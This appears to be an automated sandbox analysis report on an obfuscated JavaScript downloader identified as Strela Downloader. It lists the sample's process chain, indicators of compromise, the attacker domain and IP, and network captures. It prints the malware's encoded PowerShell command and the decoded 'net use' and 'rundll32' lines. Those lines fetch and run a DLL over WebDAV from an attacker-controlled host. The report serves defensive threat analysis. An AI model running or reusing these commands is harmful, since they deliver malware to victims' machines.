      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://aka.ms/pscore680%URL Reputationsafe
      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      apitestlabs.com
      94.159.113.48
      truetrue
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        http://apitestlabs.com:8888/Nnet.exe, 00000004.00000002.1405726227.0000015D70DF0000.00000004.00000020.00020000.00000000.sdmpfalse
          unknown
          http://apitestlabs.com:8888/~net.exe, 00000004.00000002.1405726227.0000015D70DF0000.00000004.00000020.00020000.00000000.sdmpfalse
            unknown
            http://apitestlabs.com:8888/net.exe, 00000004.00000002.1405726227.0000015D70DF0000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000003.1405345735.0000015D70E1C000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.1405796900.0000015D70E1C000.00000004.00000020.00020000.00000000.sdmpfalse
              unknown
              https://aka.ms/pscore68powershell.exe, 00000002.00000002.1408331750.000001898B3F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1408331750.000001898B3DD000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1408331750.000001898B391000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              94.159.113.48
              apitestlabs.comRussian Federation
              49531NETCOM-R-ASRUtrue
              Joe Sandbox version:41.0.0 Charoite
              Analysis ID:1541208
              Start date and time:2024-10-24 15:21:09 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 2m 37s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:6
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • GSI enabled (Javascript)
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:171596613219316174.js
              Detection:MAL
              Classification:mal92.rans.troj.spyw.expl.evad.winJS@8/3@1/1
              EGA Information:Failed
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 1
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Found application associated with file extension: .js
              • Stop behavior analysis, all processes terminated
              • Exclude process from analysis (whitelisted): dllhost.exe
              • Excluded IPs from analysis (whitelisted): 4.175.87.197
              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, sls.update.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net
              • Execution Graph export aborted for target powershell.exe, PID 712 because it is empty
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • VT rate limit hit for: 171596613219316174.js
              TimeTypeDescription
              09:22:08API Interceptor1x Sleep call for process: net.exe modified
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              94.159.113.4828807252352466216265.jsGet hashmaliciousStrela DownloaderBrowse
              • apitestlabs.com:8888/
              28807252352466216265.jsGet hashmaliciousStrela DownloaderBrowse
              • apitestlabs.com:8888/
              11625182393171315806.jsGet hashmaliciousStrela DownloaderBrowse
              • endpointexperiment.com:8888/
              68767783000729717.jsGet hashmaliciousStrela DownloaderBrowse
              • apitestlabs.com:8888/
              1118121357162151161.jsGet hashmaliciousStrela DownloaderBrowse
              • endpointexperiment.com:8888/
              68767783000729717.jsGet hashmaliciousStrela DownloaderBrowse
              • apitestlabs.com:8888/
              17233137582802518545.jsGet hashmaliciousStrela DownloaderBrowse
              • apitestlabs.com:8888/
              27670210341875216956.jsGet hashmaliciousStrela DownloaderBrowse
              • apitestlabs.com:8888/
              1118121357162151161.jsGet hashmaliciousStrela DownloaderBrowse
              • endpointexperiment.com:8888/
              2216943291147226692.jsGet hashmaliciousStrela DownloaderBrowse
              • apitestlabs.com:8888/
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              apitestlabs.com28807252352466216265.jsGet hashmaliciousStrela DownloaderBrowse
              • 94.159.113.48
              28807252352466216265.jsGet hashmaliciousStrela DownloaderBrowse
              • 94.159.113.48
              68767783000729717.jsGet hashmaliciousStrela DownloaderBrowse
              • 94.159.113.48
              68767783000729717.jsGet hashmaliciousStrela DownloaderBrowse
              • 94.159.113.48
              17233137582802518545.jsGet hashmaliciousStrela DownloaderBrowse
              • 94.159.113.48
              27670210341875216956.jsGet hashmaliciousStrela DownloaderBrowse
              • 94.159.113.48
              2216943291147226692.jsGet hashmaliciousStrela DownloaderBrowse
              • 94.159.113.48
              14159121323322190.jsGet hashmaliciousStrela DownloaderBrowse
              • 94.159.113.48
              1905917958281632044.jsGet hashmaliciousStrela DownloaderBrowse
              • 94.159.113.48
              4190314692620623581.jsGet hashmaliciousStrela DownloaderBrowse
              • 94.159.113.48
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              NETCOM-R-ASRUhidakibest.arm5.elfGet hashmaliciousGafgyt, MiraiBrowse
              • 94.159.101.41
              hidakibest.mpsl.elfGet hashmaliciousGafgyt, MiraiBrowse
              • 94.159.101.41
              hidakibest.ppc.elfGet hashmaliciousGafgyt, MiraiBrowse
              • 94.159.101.41
              hidakibest.mips.elfGet hashmaliciousGafgyt, MiraiBrowse
              • 94.159.101.41
              hidakibest.x86.elfGet hashmaliciousMirai, GafgytBrowse
              • 94.159.101.41
              hidakibest.arm6.elfGet hashmaliciousGafgyt, MiraiBrowse
              • 94.159.101.41
              hidakibest.sparc.elfGet hashmaliciousGafgyt, MiraiBrowse
              • 94.159.101.41
              hidakibest.arm4.elfGet hashmaliciousGafgyt, MiraiBrowse
              • 94.159.101.41
              28807252352466216265.jsGet hashmaliciousStrela DownloaderBrowse
              • 94.159.113.48
              28807252352466216265.jsGet hashmaliciousStrela DownloaderBrowse
              • 94.159.113.48
              No context
              No context
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:data
              Category:dropped
              Size (bytes):64
              Entropy (8bit):0.773832331134527
              Encrypted:false
              SSDEEP:3:NlllulM/l:NllU
              MD5:21F14205CCD420521F20158797DD550F
              SHA1:69A2950F28967FFF781C85FAFDC91F49E1E2A624
              SHA-256:D021F470AB6D211BC08B4DF10B4FD039E582C5BA57F371828643329F9F76E7DE
              SHA-512:8858DF0A62E1FD3D2300CB5A4CF32A15762DDA3EE77DCE440F5382163EAA1A1973704DB2EA6C7D1BFF31C8BAF5F657791595D458BA4A7710FA453CB15833E0D7
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview:@...e...........................................................
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):60
              Entropy (8bit):4.038920595031593
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
              MD5:D17FE0A3F47BE24A6453E9EF58C94641
              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
              Malicious:false
              Reputation:high, very likely benign file
              Preview:# PowerShell test file to determine AppLocker lockdown mode
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):60
              Entropy (8bit):4.038920595031593
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
              MD5:D17FE0A3F47BE24A6453E9EF58C94641
              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
              Malicious:false
              Reputation:high, very likely benign file
              Preview:# PowerShell test file to determine AppLocker lockdown mode
              File type:ASCII text, with very long lines (65536), with no line terminators
              Entropy (8bit):4.7110264324882
              TrID:
                File name:171596613219316174.js
                File size:1'418'795 bytes
                MD5:f4cf89a037227ea762cc6e1c9b286bf9
                SHA1:ba826a2e3023657b2efb471b52bc3425ed012b1f
                SHA256:9df87b2ca3327bdd843e791ae253b81f6ef1eeb765661c2dbea9d3c234a356da
                SHA512:979df89130a20e73d5b44065eef0857a45cc12c1084e9ea1f382ed27da978d457ac9d7b329e8afb69c4bac0ca8b74793c8446dde1521bdca465b04cb06c8a3b3
                SSDEEP:6144:qkzpt3+6ZvhiT8CAFlWDe6O1rM5My9FYhkM/5fe61DpF6LOFt6LM62tmt/heDRMS:/9hiT8CWc50MnDyDioVVSCtLBI5dE
                TLSH:6E659FAFECF839C8FE31914026E28B151E85FB313924D02D5934D9ED6748C93AD62D6E
                File Content Preview:tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjtceqxqbtfnhvplnymrjddkcuajrbjyeifthegypeiwecsjehbnjxgteambmvvpeacjmlvzqyadrraqtoiudfjwyjkmdjsgzwwsyxizbftgpspnbgllrqwlheajmyaorjinrmjhxzontueookxwlwksebhzajbfy
                Icon Hash:68d69b8bb6aa9a86
                TimestampSource PortDest PortSource IPDest IP
                Oct 24, 2024 15:22:07.740015984 CEST497478888192.168.2.994.159.113.48
                Oct 24, 2024 15:22:07.745429993 CEST88884974794.159.113.48192.168.2.9
                Oct 24, 2024 15:22:07.745508909 CEST497478888192.168.2.994.159.113.48
                Oct 24, 2024 15:22:07.746166945 CEST497478888192.168.2.994.159.113.48
                Oct 24, 2024 15:22:07.751507998 CEST88884974794.159.113.48192.168.2.9
                Oct 24, 2024 15:22:08.648264885 CEST88884974794.159.113.48192.168.2.9
                Oct 24, 2024 15:22:08.696229935 CEST497478888192.168.2.994.159.113.48
                Oct 24, 2024 15:22:08.717217922 CEST497478888192.168.2.994.159.113.48
                TimestampSource PortDest PortSource IPDest IP
                Oct 24, 2024 15:22:07.722784042 CEST5131953192.168.2.91.1.1.1
                Oct 24, 2024 15:22:07.732821941 CEST53513191.1.1.1192.168.2.9
                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                Oct 24, 2024 15:22:07.722784042 CEST192.168.2.91.1.1.10x8356Standard query (0)apitestlabs.comA (IP address)IN (0x0001)false
                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                Oct 24, 2024 15:22:07.732821941 CEST1.1.1.1192.168.2.90x8356No error (0)apitestlabs.com94.159.113.48A (IP address)IN (0x0001)false
                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.94974794.159.113.4888882156C:\Windows\System32\net.exe
                TimestampBytes transferredDirectionData
                Oct 24, 2024 15:22:07.746166945 CEST109OUTOPTIONS / HTTP/1.1
                Connection: Keep-Alive
                User-Agent: DavClnt
                translate: f
                Host: apitestlabs.com:8888
                Oct 24, 2024 15:22:08.648264885 CEST191INHTTP/1.1 500 Internal Server Error
                Content-Type: text/plain; charset=utf-8
                X-Content-Type-Options: nosniff
                Date: Thu, 24 Oct 2024 13:22:08 GMT
                Content-Length: 22
                Data Raw: 49 6e 74 65 72 6e 61 6c 20 73 65 72 76 65 72 20 65 72 72 6f 72 0a
                Data Ascii: Internal server error


                Click to jump to process

                Click to jump to process

                Click to dive into process behavior distribution

                Click to jump to process

                Target ID:0
                Start time:09:22:04
                Start date:24/10/2024
                Path:C:\Windows\System32\wscript.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\171596613219316174.js"
                Imagebase:0x7ff699fa0000
                File size:170'496 bytes
                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:2
                Start time:09:22:05
                Start date:24/10/2024
                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Wow64 process (32bit):false
                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgB1AG4AZABsAGwAMwAyACAAXABcAGEAcABpAHQAZQBzAHQAbABhAGIAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADEAOAA1ADcAMQA5ADQAMgA1ADYAOQAyAC4AZABsAGwALABFAG4AdAByAHkA
                Imagebase:0x7ff760310000
                File size:452'608 bytes
                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:3
                Start time:09:22:05
                Start date:24/10/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff70f010000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:4
                Start time:09:22:07
                Start date:24/10/2024
                Path:C:\Windows\System32\net.exe
                Wow64 process (32bit):false
                Commandline:"C:\Windows\system32\net.exe" use \\apitestlabs.com@8888\davwwwroot\
                Imagebase:0x7ff7a8ee0000
                File size:59'904 bytes
                MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:5
                Start time:09:22:08
                Start date:24/10/2024
                Path:C:\Windows\System32\rundll32.exe
                Wow64 process (32bit):false
                Commandline:"C:\Windows\system32\rundll32.exe" \\apitestlabs.com@8888\davwwwroot\2185719425692.dll,Entry
                Imagebase:0x7ff766150000
                File size:71'680 bytes
                MD5 hash:EF3179D498793BF4234F708D3BE28633
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Call Graph

                • Executed
                • Not Executed
                callgraph clusterC0 clusterC2C0 E1C0 entry:C0 F3C2 Function E1C0->F3C2

                Script:

                Code
                0
                tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjt...
                  1
                  tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjt...
                    2
                    tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjt...
                      3
                      tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjt...
                        4
                        tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjt...
                          5
                          tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjt...
                            6
                            tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjt...
                              7
                              tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjt...
                                8
                                tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjt...
                                  9
                                  tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjt...
                                    10
                                    tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjt...
                                      11
                                      tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjt...
                                        12
                                        tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjt...
                                          13
                                          tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjt...
                                            14
                                            tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjt...
                                              15
                                              tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjt...
                                                16
                                                tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjt...
                                                  17
                                                  tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjt...
                                                    18
                                                    tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjt...
                                                      19
                                                      tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjt...
                                                        20
                                                        tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjt...
                                                          21
                                                          tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjt...
                                                            22
                                                            tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjt...
                                                              23
                                                              tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjt...
                                                                24
                                                                tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjt...
                                                                  25
                                                                  tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjt...
                                                                    26
                                                                    tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjt...
                                                                      27
                                                                      tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjt...
                                                                        28
                                                                        tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjt...
                                                                          29
                                                                          tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjt...
                                                                            30
                                                                            tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjt...
                                                                              31
                                                                              tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjt...
                                                                                32
                                                                                tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjt...
                                                                                  33
                                                                                  tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjt...
                                                                                    34
                                                                                    tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjt...
                                                                                      35
                                                                                      tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjt...
                                                                                        36
                                                                                        tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjt...
                                                                                          37
                                                                                          tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjt...
                                                                                            38
                                                                                            tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjt...
                                                                                              39
                                                                                              tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjt...
                                                                                                40
                                                                                                tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjt...
                                                                                                  41
                                                                                                  tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjt...
                                                                                                    42
                                                                                                    tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjt...
                                                                                                      43
                                                                                                      tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjt...
                                                                                                        44
                                                                                                        tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjt...
                                                                                                          45
                                                                                                          tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjt...
                                                                                                            46
                                                                                                            tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjt...
                                                                                                              47
                                                                                                              tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjt...
                                                                                                                48
                                                                                                                tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjt...
                                                                                                                  49
                                                                                                                  tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjt...
                                                                                                                    50
                                                                                                                    tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjt...
                                                                                                                      51
                                                                                                                      tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjt...
                                                                                                                        52
                                                                                                                        tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjt...
                                                                                                                          53
                                                                                                                          tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjt...
                                                                                                                            54
                                                                                                                            tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjt...
                                                                                                                              55
                                                                                                                              tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjt...
                                                                                                                                56
                                                                                                                                tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjt...
                                                                                                                                  57
                                                                                                                                  tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjt...
                                                                                                                                    58
                                                                                                                                    tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjt...
                                                                                                                                      59
                                                                                                                                      tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjt...
                                                                                                                                        60
                                                                                                                                        tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjt...
                                                                                                                                          61
                                                                                                                                          tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjt...
                                                                                                                                            62
                                                                                                                                            tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjt...
                                                                                                                                              63
                                                                                                                                              Function ( '' + tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuz...
                                                                                                                                              • Function("return this") ➔ function anonymous()
                                                                                                                                              • () ➔
                                                                                                                                              • Windows Script Host.CreateObject("WScript.Shell") ➔
                                                                                                                                              • run("powershell -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAA...",0,false) ➔ 0
                                                                                                                                              Reset < >
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.1410300104.00007FF886C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C60000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff886c60000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                                                • Instruction ID: a7b16d63b693c8f1a6ca987c9813df078424846c94b936ce62418739aef774a3
                                                                                                                                                • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                                                • Instruction Fuzzy Hash: 5601677115CB0D8FD744EF0CE451AA5B7E0FB95364F10056DE58AC3651DA36E882CB46